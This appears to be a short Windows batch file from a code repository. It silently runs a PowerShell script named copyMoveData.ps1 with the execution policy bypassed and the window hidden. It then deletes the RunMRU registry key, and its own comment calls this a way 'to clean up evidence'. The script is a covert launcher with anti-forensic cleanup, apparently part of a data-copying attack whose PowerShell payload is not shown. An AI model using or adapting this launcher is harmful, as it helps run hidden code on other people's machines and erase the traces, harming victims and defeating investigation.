2017-04-07 14:49:35 +10:00

10 lines
354 B
Batchfile

@echo off
Rem run powershell script with bypass,nologo, and hidden flag
Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1
REM Delete registry key storing Run dialog history...to clean up evidence
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
@cls
@exit